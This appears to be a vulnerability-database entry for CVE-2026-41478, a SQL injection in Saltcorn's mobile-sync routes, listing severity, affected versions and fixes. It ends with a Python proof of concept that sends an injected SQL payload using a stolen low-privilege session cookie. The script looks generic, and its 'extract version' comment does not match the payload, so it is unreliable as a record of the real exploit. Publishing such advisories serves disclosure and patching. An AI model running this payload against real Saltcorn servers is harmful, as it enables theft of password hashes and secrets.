Security Vulnerability Report
CVE-2026-41478 CVSS 9.9 CRITICAL

CVE-2026-41478

Published: 2026-04-24 21:16:19
Last Modified: 2026-04-28 14:58:44

Description

Saltcorn is an extensible, open source, no-code database application builder. Prior to 1.4.6, 1.5.6, and 1.6.0-beta.5, a SQL injection vulnerability in Saltcorn’s mobile-sync routes allows any authenticated low-privilege user with read access to at least one table to inject arbitrary SQL through sync parameters. This can lead to full database exfiltration, including admin password hashes and configuration secrets, and may also enable database modification or destruction depending on the backend. This vulnerability is fixed in 1.4.6, 1.5.6, and 1.6.0-beta.5.

CVSS Details

CVSS Score
9.9
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:saltcorn:saltcorn:*:*:*:*:*:*:*:* (versions < 1.4.6) - VULNERABLE
cpe:2.3:a:saltcorn:saltcorn:*:*:*:*:*:*:*:* (versions 1.5.0 up to, excluding, 1.5.6) - VULNERABLE
cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha0:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:saltcorn:saltcorn:1.6.0:alpha10:*:*:*:*:*:* - VULNERABLE

Affected version ranges:
Saltcorn < 1.4.6
Saltcorn < 1.5.6
Saltcorn < 1.6.0-beta.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2026-41478 PoC Example
# Target: Saltcorn mobile-sync route
# Requires: Low-privilege authenticated user

target_url = "https://<target-host>/mobile/sync"
session_cookie = "<valid_session_cookie>"  # Low priv user session

headers = {
    "Cookie": f"saltcorn_session={session_cookie}",
    "Content-Type": "application/json"
}

# Malicious payload to extract version
payload = {
    "table": "users",
    "changes": "1=1; SELECT * FROM information_schema.tables; --"
}

response = requests.post(target_url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Potential SQL Injection successful!")
    print("[+] Response:", response.text)
else:
    print("[-] Failed")
```

Raw JSON Data
